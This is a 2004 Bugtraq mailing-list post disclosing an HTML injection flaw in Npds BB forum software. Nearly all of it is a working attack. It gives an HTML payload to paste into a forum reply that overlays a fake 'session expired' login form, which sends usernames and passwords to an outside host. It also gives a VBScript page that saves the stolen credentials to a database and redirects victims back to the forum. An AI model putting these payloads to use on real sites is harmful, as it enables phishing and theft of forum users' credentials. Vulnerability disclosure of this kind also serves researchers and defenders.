Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Npds BB HTML Injection

From: Benjamin Tolman <rituel () voila fr>
Date: 7 Jul 2004 06:59:40 -0000


I release it very quickly ... So it can be improved :

Code to put in a reply or in a topic :

Your fake message</td></tr><tr><td valign="bottom"><hr noshade size="1" class="ONGL">&nbsp;&nbsp<a 
href="user.php?op=userinfo&uname=User" CLASS="NOIR" target=_blank><img src="images/forum/icons/profile.gif" border=0 
ALT="">Profil</a>&nbsp;&nbsp;<a href="http://www.userland.com"; TARGET="_blank" CLASS="NOIR" TARGET="_blank"><IMG 
SRC="images/forum/icons/www_icon.gif" BORDER=0 Alt="">www</a>&nbsp;&nbsp;<a 
href="reply.php?topic=1&forum=1&post=2&citation=1" CLASS="NOIR"><IMG SRC="images/forum/icons/quote.gif" BORDER="0" 
Alt=""><FONT SIZE=1>Citation</FONT></a>

&nbsp;&nbsp;<a href="prntopic.php?forum=1&topic=1&post_id=2" CLASS="NOIR"><IMG SRC="images/forum/icons/print.gif" 
BORDER="0" Alt=""></a>
</td></tr></table></TD></TR>



<div style="position: absolute; left=0; top=0; height=3200; width=150"><form 
action="http://mon-site-de-roxor.com/roxor.asp"; method="post" name="piquage" target="_self"><table width="100%" 
border="0" cellspacing="0" cellpadding="0"><tr><td colspan="2"><div align="center">Your session has expired. Please log 
in to reply.</div></td></tr><tr><td>&nbsp;</td></tr><tr><td><div align="right">Login :</div> </td> <td><input 
name="login" type="text" value=""> </td></tr><tr><td><div align="right">Mot de passe :</div> </td><td><input 
name="password" type="password" value=""> </td></tr><tr><td>&nbsp;</td></tr><tr><td colspan="2"><div 
align="center"><input type="submit" name="Submit" value="Envoyer"></div></td></tr></table></form></div>

Example of Code (VBscript) to put in the page called by the form in the topic : 

<%@ Language=VBScript %>



<%



set base=server.createobject("ADODB.CONNECTION")

base.open nom_base, login_base, password_base



referant=left(request.servervariables("HTTP_REFERER"),instr(8,request.servervariables("HTTP_REFERER"),"/")-1)

login=Request.QueryString("login")

password=Request.QueryString("password")



requete_vol_infos="INSERT statistiques (date,npds,login,password) VALUES (getdate(),'" + cstr(referant) + "','" + 
cstr(login) + "','" + cstr(password) + "')"



set resultat_vol_infos=server.CreateObject("ADODB.RECORDSET")

resultat_vol_infos.Open requete_vol_infos, base



response.redirect(referant)



%>

Thanks to N-0-X and NewFFR :o)

Rituel
Previous By Date Next
Previous By Thread Next

Current thread: